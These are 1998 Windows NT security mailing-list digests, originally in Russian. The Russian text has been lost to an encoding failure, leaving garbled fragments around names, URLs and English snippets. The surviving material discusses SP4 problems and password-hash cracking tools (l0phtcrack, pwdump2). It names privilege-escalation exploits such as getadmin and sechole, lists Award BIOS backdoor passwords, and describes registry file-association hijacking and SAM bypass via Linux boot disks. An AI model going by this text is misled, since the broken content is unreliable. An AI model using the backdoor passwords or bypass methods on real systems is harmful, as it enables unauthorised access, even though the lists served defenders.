 DHCP Manager  WINS Manager.

8. ,     


"Radojevic, Lynn" <radojevd@AAFES.COM> (ntsecurity, cooper) , 
   ,       
.

"Raymond P. Galloni" <rpgallon@MITRE.ORG> (ntsecurity, cooper) 
   net user,    , 
  

http://www.winntmag.com/Content/1998/May/3071/Script-Listing1.txt

"MarElia, Darren" <Darren.MarElia@SCHWAB.COM> (ntsecurity, cooper) 
,   NLTEST  Resource Kit NT   
.

Paul Olson <polson@GREATPLAINS.COM> (ntsecurity, cooper)  
    exporter,      
http://www.adkins-resource.com.

Casey Ray <cray@MITRETEK.ORG> (ntsecurity, cooper)   
 Hyena    www.adkins-resource.com.

9. l0pht

DS2 Gene R Gomez <grg@essex.navy.mil> (ntsecurity, iss) ,  
   ,   
   l0pht (  
    Windows NT).

"Ryan Russell" <ryanr@sybase.com> (ntsecurity, iss) ,   
 SP3   Lhash,       
  LanManager   (.   ).   
,  l0pht    NTLM,  . 
,      .

From: Eric Schultze <bealls@ix.netcom.com> (ntsecurity, iss) ,  
 lm-fix    LanManager,    
 .

"Pfeil, Ken \(NSTS.JAX\)" <Kpfeil@NA2.US.ML.com> (ntsecurity, iss) 
,   syskey     l0pht. 
 "SanMillan, Todd" <tis3@cdc.gov>     
http://www.webspan.net/~tas/pwdump2,     
   syskey.

Frank Knobbe <FKnobbe@Home.com> (ntsecurity, iss)    
   .

Andreas Wennstrom <aaww@home.se> (ntsecurity, iss)    
 NTPassWord,     
 .

http://home.bip.net/aaww/ntpw.htm

http://members.xoom.com/wennstrom/ntpw.htm

       l0pht Paul Leach 
<paulle@microsoft.com> (ntsecurity, iss)   SP4  
   NTLMv2. 

http://support.microsoft.com/support/kb/articles/q147/7/06.asp

,   .   l0pht     
.    l0pht   , 
   ,   NTLMv2 
     NTLM.

 .   2  "  
   Windows NT" (http://www.training.ru/security/book.htm) 
        Windows NT, 
       (Lan Manager  
Windows NT),   Lan Manager  ,    
 Syskey.

10.   C2

Nathan <nay@vip.solis.co.uk> (ntsecurity, iss) ,    
   C2.

"Alva John Nims" <nims@commandant.aero.org> (ntsecurity, iss)  


http://www.radium.ncsc.mil/
  "TCSEC",  "The Interpreted Trusted Computer System 
Evaluation Criteria Requirements",       
5200.28-STD.

11.    

"Schmetz, Leon" <Leon.Schmetz@nl.origin-it.com> (ntsecurity, iss)  
   ,        
      (  
 ).

,   ,      
Q172402 "Auditing Logon Failures Does Not Log Remote Failures", Q182918 
"Account Lockout Event also Stored in Security Event Log", Q173059 "Security 
Events Are Not Logged During Audit".

12.   HTML

Micheal Espinola Jr <micheale@ix.netcom.com> (ntsecurity, iss) , 
     HTML      
 URL    ,    - .

"Adam Alexander" <adam@tjconline.com> (ntsecurity, iss) ,   
    POST  GET.    
  GET,      URL  
 ,       URL, 


http://whatever.com/test.cgi?name1=value1&name2=value2&age=19

    POST  .   
   HTTP,    URL.

13.  Windows 95    


Richard Pearson <RichardP@PIN.CO.ZA> (ntsecurity, cooper) ,  
      Windows 95    
     "From your friendly hacker : 
Your machine wil reboot in 10 Seconds. Hehehehehe."

George Giatsios <ggiats@HOL.GR> (ntsecurity, cooper)  Rich Galbraith 
<RGALBRAITH@SWICHTEC.CO.NZ> ,   
 Backorifice  Netbus,      
     IP-   
   .

14.     
 

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq)      
      Firewall-1 v3.0b

<http://www.diligence.co.uk/advis.htm>

<http://www.netspace.org/cgi-
bin/wa?A2=ind9810d&L=bugtraq&F=&S=&P=5792>

<http://www.netspace.org/cgi-
bin/wa?A2=ind9810d&L=bugtraq&F=&S=&P=5899>

Thievco <thievco@SPRITE.NETNATION.COM> (ntbugtraq)   
 ,     Firewall-1

http://www.thievco.com/conf/fw1confguide.html

*****************************************************
  Sunbelt
http://www.sunbelt-software.com

 ,  , Balance Suite  AutoPilot 
  SP4.    ,   
.

  Microsoft  -   NT5

http://www.microsoft.com/train_cert/courses/index/nt5moc.htm

    ,   Microsoft 
NT 4.0

http://www.microsoft.com/train_cert/resource/nts4res.htm

 

http://www.zdnet.com/pcweek/stories/news/0,4153,361425,00.html

       Caterpillar 
     .   
       
 .

    TEM

http://www.sunbelt-software.com/tem.htm

      .

   GartnerGroup   2000  (Y2K)

http://www.wired.com/news/news/business/story/14244.html


From rudnyi@td.chem.msu.su Sun Nov 15 19:40:19 1998
Received: from mch.chem.msu.su (mch.chem.msu.su [158.250.32.33])
	by comp.chem.msu.su (8.9.1/8.9.1) with ESMTP id TAA24028;
	Sun, 15 Nov 1998 19:40:16 +0300 (MSK)
Received: from td.chem.msu.su (td.chem.msu.su [158.250.32.41])
	by mch.chem.msu.su (8.9.1/8.9.1) with SMTP id TAA00121;
	Sun, 15 Nov 1998 19:39:28 +0300 (MSK)
Resent-Date: Sun, 15 Nov 1998 19:39:28 +0300 (MSK)
Received: from r_home.chem.msu.su (unverified [158.250.48.206]) by td.chem.msu.su
	(EMWAC SMTPRS 0.83) with SMTP id <B0000004995@td.chem.msu.su>;
	Sun, 15 Nov 1998 19:41:34 +0300
Message-ID: <002801be10b6$c2721020$ce30fa9e@r_home.chem.msu.su>
From: "security" <security@training.ru>
To: <security@td.chem.msu.su>
Subject: digest 2-8.11.98
Date: Sun, 15 Nov 1998 19:39:32 +0300
MIME-Version: 1.0
Content-Type: text/plain;
	charset="koi8-r"
Content-Transfer-Encoding: 8bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 4.72.2106.4
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.2106.4
Sender: security-request@td.chem.msu.su
Resent-Message-Id: <B0000004996@td.chem.msu.su>
Resent-From: security@td.chem.msu.su
X-Unsub: To leave, send text 'LEAVE' to <security-request@td.chem.msu.su>
Status: O

   Windows NT

() 1998,   ,    

    http://www.training.ru/security/  
  security@training.ru

2 - 8  1998 

   "     Windows
NT" (http://www.training.ru/security/book.htm)

   (blue screen of death) -  
 (    ),   
       Windows
NT.

  (. )    . 
    ntsecurity (Cooper),    ntsecurity (iss)
 .

                                          ()
ntbugtraq                           13                            32
ntsecurity (Cooper)                11                             23
ntsecurity (iss)                    72                           188
ntsecurity (wwa)                     0                             0

    .

1.   Service Pack 4.0

1.1.   

   ,   SP4  
 .

Craig Holland <cholland@YAHOO-INC.COM> (ntbugtraq) , 
  SP4     
Legato.

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq)   , 
      ,
    ,    
  SP4 (  SP4     
 ).

1.2.  

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq)    ,
   SP4.     
http://ntbugtraq.ntadvice.com.

    SP4 c CD   , 
  SP4,   .

1.3.   SP4

Chris Howell <Chris.L.HOWELL@ODOT.STATE.OR.US> (ntbugtraq)
     SP4

http://www.zdnet.com/zdnn/stories/news/0,4586,2159061,00.html

1.4.   SP4

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq) (ntsecurity, cooper) ,
    SP4  

ftp://ftp.microsoft.com/bussys/winnt/winnt-public/

  SP4     HTTP   Conxion
(http://www.conxion.com),   
.

     

http://support.microsoft.com/support/ntserver/content/servicepacks/default.asp
http://www.microsoft.com/support/winnt/default.htm

"Espinola, Mike" <Mike.Espinola@EastmanSoftware.com> (ntsecurity, iss)
    x86-

40-bit version of Service Pack 4
********************************
Traditional Download (formerly Standard Installation)
~~~~~~~~~~~~~~~~~~~~
http://mssjus.www.conxion.com/msdownload/sp4/x86/en/Nt4sp4i.exe
http://msvaus.www.conxion.com/msdownload/sp4/x86/en/Nt4sp4i.exe
http://mschus.www.conxion.com/msdownload/sp4/x86/en/Nt4sp4i.exe
ftp://ftp.microsoft.com/bussys/winnt/winnt-
public/fixes/usa/nt40/usSP4/Nt4Sp4i.exe

Traditional Download Symbols (formerly Standard Installation Symbols)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://mssjus.www.conxion.com/msdownload/sp4/x86/en/Nt4sym4i.exe
http://msvaus.www.conxion.com/msdownload/sp4/x86/en/Nt4sym4i.exe
http://mschus.www.conxion.com/msdownload/sp4/x86/en/Nt4sym4i.exe
ftp://ftp.microsoft.com/bussys/winnt/winnt-
public/fixes/usa/nt40/ussp4/Nt4sym4i.exe

Optimized Installation (formerly Minimal)
~~~~~~~~~~~~~~~~~~~~~~
http://support.microsoft.com/download/support/mslfiles/Nt4min4i.exe
http://mssjus.www.conxion.com/msdownload/sp4/x86/en/NT4MIN4I.EXE
http://msvaus.www.conxion.com/msdownload/sp4/x86/en/NT4MIN4I.EXE
http://mschus.www.conxion.com/msdownload/sp4/x86/en/NT4MIN4I.EXE

Year 2000 Download (formerly Year 2000 Installation)
~~~~~~~~~~~~~~~~~~
http://mssjus.www.conxion.com/msdownload/sp4/x86/en/Nt4y2k4i.exe
http://msvaus.www.conxion.com/msdownload/sp4/x86/en/Nt4y2k4i.exe
http://mschus.www.conxion.com/msdownload/sp4/x86/en/Nt4y2k4i.exe
ftp://ftp.microsoft.com/bussys/winnt/winnt-
public/fixes/usa/nt40/usSP4/Nt4y2k4i.exe

128-bit version of Service Pack 4
*********************************

http://mssecure.www.conxion.com/cgi-bin/ntitar.pl

2.    
 FTP

Jason Garms <jasong@microsoft.com> (ntbugtraq) (ntsecurity, cooper)
,     (SCM, Security Configuration
Manager)      .

ftp://ftp.microsoft.com/bussys/winnt/winnt-public/tools/SCM/

"James Strompolis" <jimst@enteract.com> (ntsecurity, iss)   
   SCM.     hisec, 
      HTTP 
FTP.

3.    IE4

Fabio Ciucci <fabioc@anfiteatro.it> (ntsecurity, iss)    
IE4.    

http://www.anfyjava.com/iebug/

Fabio Ciucci    ,  , 
,  ,   . 
  ,   . 
   .

4.   BIOS

   Paul L Schmehl <pauls@UTDALLAS.EDU> ,
      BIOS.   
 .   .

, Paul L Schmehl <pauls@UTDALLAS.EDU> (ntbugtraq) 
 .  BIOS    
(backdoor passwords).    ,   .
, AWARD BIOS      
AWARD_SW, AWARD_PW  j262 (   ).

   "BIOS passwords",      
 BIOS.       
.

http://www.hedgie.com/passwords/bios.html
http://hem.passagen.se/unaxor/cracking.html
http://www.voicenet.com/~raze/files/textfaq/pchack.txt
http://www.geocities.com/Area51/Zone/6430/cracking.html

Mikko Hypponen <Mikko.Hypponen@DATAFELLOWS.COM> (ntbugtraq)
,        "F-Secure
Anti-Virus Update Bulletin 4.01":

http://www.DataFellows.com/bulletin/bull-401.htm#questions

5.    MS Proxy
Server 2.0

Todd Sabin <tas@WEBSPAN.NET> (ntbugtraq)   
.     MSP 2.0  
       IP. 
 ,       
 ,     ,    
   .     ,  MSP
2.0    .

6.   SQL ( 
)

Chris LaMont [mailto:clamont@EXCHANGE.ABTCAMPUS.COM]
(ntsecurity, cooper) ,   SQL 128- .
 ,   

http://support.microsoft.com/support/kb/ARTICLES/Q132/2/24.asp?PR=SQL&
T1=30d&FR=0&A=T&T=B&S=F&

,    SQL    
    .

Paul Leach <paulle@MICROSOFT.COM> (ntsecurity, cooper) ,  
 Q132224  . NT RPC   
 (connection oriented)   128- ,
      NT  .   
 RPC  NT4/SP3   40- ,
        .
NT4/SP4   ,   RPC 
 128- .

7. ,    


    ,   ,  
   .

David LeBlanc <dleblanc@MINDSPRING.COM> (ntsecurity, cooper)
   net user.  ,  
    ,     .

Craig Keegan <Craig.Keegan@COLESMYER.COM.AU> (ntsecurity, cooper),
,      NTSecurity Administrator

http://www.scullin.starway.net.au/~ckeegan/index.html

8.   Windows NT 
 

"Attila Rozgonyi" <attila.rozgonyi@leicon.com.au> (ntsecurity, iss) ,
        
.

tony.caple@coreinc.com (ntsecurity, iss) ,     
  P-synch.

"Harmer, Michael E." <harmer@udri.udayton.edu> (ntsecurity, iss) , 
      ADSI.  ,
 ,    ASP   
  .   ADSI    

HTTP://www.15seconds.com
http://www.microsoft.com/ntserver/windowsnt5/exec/feature/ADInterface.asp

Marcio Henrique Leiner <cana@dcc.unicamp.br> (ntsecurity, iss) , 
      , 
       
       
.

9.   Exchange

    ,    
 Windows NT  Exchange.     ,
      Exchange.

"Larry Osterman \(Exchange\)" <larryo@exchange.microsoft.com> (ntsecurity,
iss) ,  Exchange     
    ("push notification").   
,        
RPC.       .

    . , 
 ,       .
,       
     .

Fernando Cima <Cima@via-net.com.br> (ntsecurity, iss) ,  Site
Connector   RPC    , 
-   (.  Q176466).

10.   

Matthew_S_Cramer@armstrong.com (ntsecurity, iss) ,  
  .    -
,      ,  
   .

Bart Pola <pola@cns.uni.edu> (ntsecurity, iss)  
   Linux,   
  Windows NT.

"Patrick Sweeney" <brookslaw@hotmail.com> (ntsecurity, iss)  
  http://www.sysinternals.com,    
    .

"MrJoker" <MrJoker@goplay.com> (ntsecurity, iss) ,   
 SAM (     FAT),    
   .

"Kohan, Fernando" <FKohan@uces.edu.ar> (ntsecurity, iss) 
 NT         
.   -     
  SAM  ,    .

"Jeff A. Dunkelberger" <jeffdunkelberger@hotmail.com> (ntsecurity, iss)
,    Linux   
     www.nmrc.org.

Matt Cormie <Matt_Cormie@pml.com> (ntsecurity, iss)   
http://www.winternals.com,      NT Recover 
NT Locksmith.

"John Sweeney" <quantium@mediaone.net> (ntsecurity, iss) ,  
   Linux    
 SAM,     l0phtcrack.  
  sechole.    
    NT SP3.

Bart Pola <pola@cns.uni.edu> (ntsecurity, iss)    
  Linux.  ,     
   (, ),    , 
  syskey.

"MJE" <mark@ntshop.net> (ntsecurity, iss)    
sechole

http://www.ntshop.net/scripts/load.asp?iD=/security/sechole.htm

, Matthew_S_Cramer@armstrong.com (ntsecurity, iss)  
   ,      
.

    getadmin.exe (  
),       SP4. 
      sechole.exe ( 
  ),       SP4. 
 NT Recover  NT Locksmith,      .
  Linux  ,   
 syskey.

   . Matthew_S_Cramer 
  NT        (logon.scr), 
   winlogon,    
USRMGR.EXE. Winlogon     ,   
  , Matthew_S_Cramer  
 .

   ,       
 winlogon   

HKEY_USERS\.DEFAULT\Control Panel\Desktop
                                                   ScreenSaveActive=0

11.   NBTSTAT

Feyd Nemo <feyd@shadowstorm.net> (ntsecurity, iss)  
.  NBTSTAT -A xx.xx.xx.xx  NBTSTAT -a HostName 
  NETBIOS  , 

HostName          <00>  UNIQUE      Registered
HostName            <20>  UNIQUE      Registered
Domain             <00>  GROUP       Registered
Domain             <1C>  GROUP       Registered
Domain             <1B>  UNIQUE      Registered
Domain             <1E>  GROUP       Registered
HostName           <03>  UNIQUE      Registered
Domain             <1D>  UNIQUE      Registered
..__MSBROWSE__.<01>  GROUP       Registered
HostName           <6A>  UNIQUE      Registered
HostName           <BE>  UNIQUE      Registered
HostName           <6B>  UNIQUE      Registered
HostName           <87>  UNIQUE      Registered
HostName           <01>  UNIQUE      Registered
UserID        <03>  UNIQUE      Registered

     ,   
.      Windows 95 
 nbtstat?

Simon Clausen <sclausen@avirnex.com.au> (ntsecurity, iss) 
  W95  

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Polici
es\WinOldApp]
"Disabled" - Disable MS-DOS Prompt
"NoRealMode" - Disables Single-Mode MS-DOS

  ,       

http://www.regedit.com/Security/Restrictions_and_Policies/

vasudeva@downcity.net (ntsecurity, iss) ,   
 Messenger  Alerter,      
   nbtstat. ,    
 (, net send).   ,   
     (, NET USER
/DOMAIN, showmbrs  showgrps  Resource Kit).

12.    

"Rob Slade, doting grandpa of Ryan and Trevor" <rslade@sprint.ca>
(ntsecurity, iss)    

Windows NT Server 4 Security Handbook", Lee Hadfield/Dave Hatter/Dave
Bixler, 1997, 0-7897-1213-X, U$39.99/C$56.95/UK#36.99
%A   Lee Hadfield
%A   Dave Hatter dhatter@definiti.com
%A   Dave Bixler dbixler@art-deco.net
%C   201 W. 103rd Street, Indianapolis, IN   46290
%D   1997
%G   0-7897-1213-X
%I   Macmillan Computer Publishing (MCP)
%O   U$39.99/C$56.95/UK#36.99 800-858-7674 info@mcp.com
%P   476 p.
%T   "Windows NT Server 4 Security Handbook"

  ,        Windows
NT,      .

13. NetMeeting

"Yvonne Parle" <ca130781@p085.aone.net.au> (ntsecurity, iss) , 
      
NetMeeting.

"Barry Lewis" <lewisb@cerberus-isc.com> (ntsecurity, iss) , 
NetMeeting      . 
,      NetMeeting  
 -   ,     
   .

14. C2Forum

"dan.chang" <dan.chang@cwix.com> (ntsecurity, iss)   ,
http://www.c2forum.com,      
 .    c2forum-
request@listserver.cybercon.com.

*********************************************************
   Sunbelt (http://www.sunbelt-software.com)

  Infoworld Electric    Windows NT.

http://www.infoworld.com/cgi-bin/displayStory.pl?981027.wcwin2000.htm

1) NT Workstation 5.0  Windows 2000 Professional.
2) NT Server 5.0  Windows 2000 Server.
3)    Windows 2000 Datacenter Server, 
       . 
 16   64GB .
4) Windows NT 5.0 Enterprise Edition  Windows 2000 Advanced
Server.

   Windows 2000    "Built on
Windows NT technology".

Windows 2000     Beta 2   
  1999.




From rudnyi@td.chem.msu.su Sun Nov 22 23:04:37 1998
Received: from td.chem.msu.su (td.chem.msu.su [158.250.32.41])
	by comp.chem.msu.su (8.9.1/8.9.1) with SMTP id XAA02645;
	Sun, 22 Nov 1998 23:04:36 +0300 (MSK)
Resent-Date: Sun, 22 Nov 1998 23:04:36 +0300 (MSK)
Received: from comp.chem.msu.su (unverified [158.250.32.40]) by td.chem.msu.su
	(EMWAC SMTPRS 0.83) with SMTP id <B0000005130@td.chem.msu.su>;
	Sun, 22 Nov 1998 23:06:16 +0300
Received: from r_home.chem.msu.su ([158.250.48.206])
	by comp.chem.msu.su (8.9.1/8.9.1) with SMTP id XAA02638
	for <security@td>; Sun, 22 Nov 1998 23:02:59 +0300 (MSK)
Message-ID: <000201be1653$6f28e400$ce30fa9e@r_home.chem.msu.su>
From: "security" <security@training.ru>
To: <security@td.chem.msu.su>
Subject: digest 8-15.11.98
Date: Sun, 22 Nov 1998 23:05:19 +0300
MIME-Version: 1.0
Content-Type: text/plain;
	charset="koi8-r"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 4.72.2106.4
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.2106.4
X-MIME-Autoconverted: from 8bit to base64 by comp.chem.msu.su id XAA02638
Sender: security-request@td.chem.msu.su
Resent-Message-Id: <B0000005131@td.chem.msu.su>
Resent-From: security@td.chem.msu.su
X-Unsub: To leave, send text 'LEAVE' to <security-request@td.chem.msu.su>
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from base64 to 8bit by comp.chem.msu.su id XAA02645
Status: RO

   Windows NT

() 1998,   ,    

   http://www.training.ru/security/   
 security@training.ru

9 - 15  1998 

   "     Windows
NT" (http://www.training.ru/security/book.htm)

  (relative identifier, RID) -  
 .    
    ,  
    ,
  1000.

    .     .

                                          ()
ntbugtraq                           15                            28
ntsecurity (Cooper)                63                             96
ntsecurity (iss)                    53                           184
ntsecurity (wwa)                     0                             0

    .

1.   Service Pack 4.0
1.1.   

jc <jc@ROCHESTER.RR.COM> (ntbugtraq) ,  Oracle Application
Server 4.0.6.4, , -,  Oracle Web Application Server 3.0.X,
  SP4.

Steve Boyce <SteveB@HBS.COM> (ntsecurity, cooper) ,  
   haspnt.sys (www.aks.com),  
    ,   
SP4.

1.2.  

Jrg Maletzky <joerg.maletzky@RZ.UNI-ROSTOCK.DE> (ntbugtraq)
,    SP4    
       
 regedt32. Russ <Russ.Cooper@RC.ON.CA>  
.

2.   

Rowan Macintosh <rowan@MATILDA.VUT.EDU.AU> (ntsecurity, cooper)
,    Security Configuration Manager 
  (security permission editor) NT  
 ,    .  
     TEST   
 SCM,    ,    TEST
.

3.  RASMIN

Raimondo Carluccio <rcarl@deckpoint.ch> (ntsecurity, iss) 
   (baco@deckpoint.ch  sam@deckpoint.ch) 
 RASMIN,   NT.

      (McAfee, AVP).
   - RASMIN.EXE, WSPOOL.EXE, WINSRVC.EXE,
INIPX.EXE, UPGRADE.EXE.      
 .

       531. 
  .

4.   ICQ

Mnemonix <mnemonix@globalnet.co.uk> (ntbugtraq) (ntsecurity, iss)
,  Mirabilis' ICQ (ICQ 98beta)   . 
   ,     IP-
(   ),     ICQ 
    IP-  . 
   ,  
       .

"Ray Zeitler" <rzeitler@regence.com> (ntsecurity, iss) , ,  
, ICQ   IP- .

 "Maverick" <neres@cimaq.com.br> (ntsecurity, iss) , 
 IP-       .
 ,    ICQ    IP-
,   .

5.  

leblond <ag.leblond@VIDEOTRON.CA> (ntsecurity, cooper) , 
    137, 138  139   
.

"Kevin T. Shivers" <kts@CLARK.NET> (ntsecurity, cooper) 
 .

1.     'Network Neighborhood'  
'Properties'.
2.   Protocols.
3.   TCP/IP,   Properties...
4.   IP address   Advanced...
5.   Enable Security    .
6.         , 
 .

6.   

   Micheal Espinola Jr <micheale@IX.NETCOM.COM>
(ntsecurity, cooper) ,    SP4  , 
    (C$, D$  ..),  Windows NT
   . Blakie, Graham
<Graham.Blakie@comalco.riotinto.com.au> (ntsecurity, cooper) ,  
  Windows NT    
      .

Alan Ramsbottom <ACR@ALS.CO.UK> (ntsecurity, cooper) 
,       .

Paul Leach <paulle@MICROSOFT.COM> (ntsecurity, cooper) 
,       
 ,      
     .   ,
    , ,  ,
 . ,   ,     
      
(,  ) ,  ,   
  .

 Paul Leach ,     
    ,      
 SP4.

7. NBTSTAT

    ,   ,  

nbtstat -A w.x.y.z

       IP-
w.x.y.z.

Mnemonix <mnemonix@globalnet.co.uk> (ntsecurity, iss) 
    Perl,   
  ,  nbtstat, ,  , 
.

$name;
unless(open (FILE , "c:\\account.txt")) {
 die ("Doh!!!");}
$name = <FILE>;

while ($name ne "")
 {
  system("net name $name");
  $name = <FILE>;
 }
close(FILE);

,   c:\\account.txt   
.

8. Passfilt.dll    

"Buono, Christopher" <ChrisB@MATRIXTECH.COM> (ntsecurity, cooper)
,     Passfilt.dll   
.

"Bill Potvin, II" <bpotvin@MERXSOFT.COM> (ntsecurity, cooper)
,      .
  ,     , 
  Passfilt.dll.

Jason Garms <jasong@MICROSOFT.COM> (ntsecurity, cooper) 
 Bill Potvin.     
   ,    
 Passfilt.dll

 .   Passfilt.dll   
    "    
Windows NT" (http://www.training.ru/security/book.htm)  . 50-52.

9. NBT

RobsonK@ebrd.com (ntsecurity, iss)   ,  
NBT (NetBios  TCP/IP).       John
C Dvorak,    
.

   ,      . 
     ,   . 
,      ZDNET,  
.

http://www.zdnet.com/pcmag/insites/dvorak/jd981102.htm

[Begin Quote]

Once you are up on a system, you can communicate with your site via
various FTP packages or, better still, by using LMHosts--a little-known
protocol built into most versions of Windows 95/98 and NT. LMHosts means
LAN Manager Hosts, and it's some throwback program that Microsoft
doesn't talk much about. The only documentation is a text file found
under the Windows subdirectory called Lmhosts.sam. Essentially the
program allows you to attach a remote server to your machine as if it
were a local or networked drive. You don't have to use FTP for anything.
You just slide stuff on and off your machine to the remote machine with
drag-and-drop. The machine shows up on your desktop as a folder. Even
support people at Microsoft don't know about this cool feature.

[End Quote]

    ,    W95  NT  
       , , 
,         
.   NT    

net use x: \\w.x.y.z

 w.x.y.z - IP  .

  W95    ,  
  IP     lmhosts.

     ,   
 NBT.

10.   NTFS

 "Linley, Patrick" <plinley@nt.library.msstate.edu> (ntsecurity, iss) 
  ,   WordPerfect8   
 NT Workstation 4.0 Service Pack 3.    
    

Administrators  Full Control (All) (All)
CREATOR OWNER Full Control (All) (All)
Everyone  Change (RWXD)(RWXD)
System   Full Control (All) (All)

    .  ,   
 .

"Ellison, Kevin D." <KEllison@sprg.smhs.com> (ntsecurity, iss) , 
      
   ,    
 .  : 1)   Everyone  Domain
Users, 2)     , 
   .

"Patrick Sweeney" <brookslaw@hotmail.com> (ntsecurity, iss) 
 ,  ,      
   WordPerfect8.

1.   filemon   http://www.sysinternals.com.
2.  Filemon  PC.
3.        .
4.  FileMon.
5.  WordPerfect.
6.  WordPerfect.
7.   FileMon    "End Capture Events".

Chris Barnash <barnash@nu.cs.fsu.edu> (ntsecurity, iss)  
  -  WordPerfect8,      Find
  ,  .

 .     
     "   
 Windows NT" (http://www.training.ru/security/book.htm)  . 81-83.

11.  TCP/IP 

John Stewart <stewart_john_h@SSSD.NAVY.MIL> (ntsecurity, cooper)
  ,     .
Forrest Houston <fhouston@EAST.ISI.EDU>  
Network Flight Recorder (www.nfr.net). Steve Manzuik
<steve@LDSCAL.COM>   ODS Secureswitch
(www.ods.com).

Benjamin Conrad <bconrad@BBNPLANET.COM> (ntsecurity, cooper)
  ,     
   TCP/IP. Paul L Schmehl
<pauls@UTDALLAS.EDU>    
,    http://www.signal9.com/.

David LeBlanc <dleblanc@MINDSPRING.COM> (ntsecurity, cooper)
   ,    "
  ".

s = socket(AF_INET, SOCK_RAW, PROTO_IP);

while(recvfrom(s, buf, bufsize, 0) > 0)
{
        //process packets here -
        //NT 4.0 will give you the whole packet in the data
}

12. CD 

Christine Keogh <Christine.Keogh@ANU.EDU.AU> (ntsecurity, cooper)
,     CD .

"Lieberzeit, Vladja" <VLieber@RKK.CZ> (ntsecurity, cooper) 
 Skytale Device Protector, http://www.skytale.com.

13.  MS Proxy 2.0

Victor.DIAS-FERNANDES@DG12.cec.be (ntsecurity, iss)   
,    MS Proxy 2.0

http://www.comnet.be/ProxyConf/freestuff.html

14. User Manager for Domains  W95 
Workstation NT

"Mohamed .M Abdalla" <mabdalla@STARNET.COM.EG> (ntsecurity, cooper)
,    User Manager for Domains  W95  Workstation
NT?

Paul Olson <polson@GREATPLAINS.COM> (ntsecurity, cooper) , 
      NT Server  
\clients\srvtools.

15.    
 

"Byrnes, Jamie" <jamie.byrnes@KBJV.COM> (ntbugtraq) , 
 Cheyenne Arcserve Exchange DB Agent  
c:\exchverify.log,      . Russ
<Russ.Cooper@RC.ON.CA>   .  
,          
\SOFTWARE\CHEYENNE\DSAgent\CurrentVersion\agent.

Alexandre Steinberg <steinberg@BASE.COM.BR> (ntbugtraq) , 
   Post.Office   3.1  3.5 
    (mail relay). , Francois Yves Le
Gal <flegal@ALLABAN.FR>    .  
   .

*********************************************************
   Sunbelt

 

http://www.sift.com/cgi-bin/ntfree2

      SELLING
WINDOWS NT SOLUTIONS.

   Services for UNIX Add-On Pack, 
  Windows NT  Unix.




From rudnyi@td.chem.msu.su Sun Nov 29 22:40:25 1998
Received: from td.chem.msu.su (td.chem.msu.su [158.250.32.41])
	by comp.chem.msu.su (8.9.1/8.9.1) with SMTP id WAA21407;
	Sun, 29 Nov 1998 22:39:52 +0300 (MSK)
Resent-Date: Sun, 29 Nov 1998 22:39:52 +0300 (MSK)
Received: from r_home.chem.msu.su (unverified [158.250.48.206]) by td.chem.msu.su
	(EMWAC SMTPRS 0.83) with SMTP id <B0000005224@td.chem.msu.su>;
	Sun, 29 Nov 1998 22:42:48 +0300
Message-ID: <000501be1bd0$12a36c00$ce30fa9e@r_home.chem.msu.su>
From: "security" <security@training.ru>
To: <security@td.chem.msu.su>
Subject: digest 16-22.11.98
Date: Sun, 29 Nov 1998 22:40:07 +0300
MIME-Version: 1.0
Content-Type: text/plain;
	charset="koi8-r"
Content-Transfer-Encoding: 8bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 4.72.2106.4
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.2106.4
Sender: security-request@td.chem.msu.su
Resent-Message-Id: <B0000005225@td.chem.msu.su>
Resent-From: security@td.chem.msu.su
X-Unsub: To leave, send text 'LEAVE' to <security-request@td.chem.msu.su>
Status: RO

   Windows NT

() 1998,   ,    

   http://www.training.ru/security/   
 security@training.ru

16 - 22  1998 

   "     Windows
NT" (http://www.training.ru/security/book.htm)

   (pass-through authentication) - 
,      ,
 ,   .

  (. )      ,  
   ntbugtraq  ntsecurity (Cooper)  .

                                          ()
ntbugtraq                           32                            81
ntsecurity (Cooper)                28                             43
ntsecurity (iss)                    48                           142
ntsecurity (wwa)                     0                             0

    .

1.   Service Pack 4.0

1.1.  LSASS DoS

 Steve Manzuik <smanzuik@HOTMAIL.COM>  , 
  SP4  LSASS DoS - .  
 (ntbugtraq),      
  ,  ,     
   .

1.2.    SP4

"Mark T. Edmead" <mark@MTESOFT.COM> (ntsecurity, cooper)  
    .  ,
Q194334 (October 19, 1998),   SP4  hotfix -l -
   ,   SP4.  , 
   ,     
.

    MTE Software   
SPClean,         
 ,       (uninstall
directories).     www.mtesoft.com.

2. HKey_Classes_Root

Benjamin Webb <benrwebb@NETSCAPE.NET> (ntbugtraq) 
  ,     
HKey_Classes_Root.        ntsecurity,
(cooper),  ,  ,    ,   
,   .

 HKey_Classes_Root   
HKEY_LOCAL_MACHINE\software\classes,     , 
        
.     

Everyone:Read Interactive:Special

   ,    
.       . 
       
" ".   ,     
 .doc    crack.bat,   
   ,     Winword.
 ,     
        .doc.

David Mahon <ddmn_ss@TROI.CC.ROCHESTER.EDU> (ntbugtraq) ,
     HKey_Classes_Root   ,
   (Netscape Navigator/Communicator 4.x, Office 97 
.)        
.       , 
   . Netscape Navigator  
 ,          
  regedit    .

Jason Adam Young <jason_young@NCSU.EDU> (ntbugtraq) , , 
 ,       HKey_Classes_Root.
   admin:f system:f users:r,   
     ,  
.       regmon.  
,    -  Microsoft Office, 
       .

Eric Lochstet <lochstet@POBOX.UPENN.EDU> (ntbugtraq) , 
    Netscape
Navigator/Communicator 4.x

HKLM\SOFTWARE\Classes\NetscapeMarkup\protocol\StdFileEditing
HKLM\SOFTWARE\Classes\NetscapeMarkup
        (     NetscapeMarkup)
HKLM\SOFTWARE\Classes\CSLID\{61D8DE20-CA9A-11CE-9EA5-
0080C82BE3B6}
        (      CSLID)

Paul Leach <paulle@MICROSOFT.COM> (ntbugtraq) ,  c
 Office 2000   ,  
 ,     Office  .

Eric Johnfelt <ejohnfel@IC.SUNYSB.EDU> (ntbugtraq)   
  HKey_Classes_Root.     
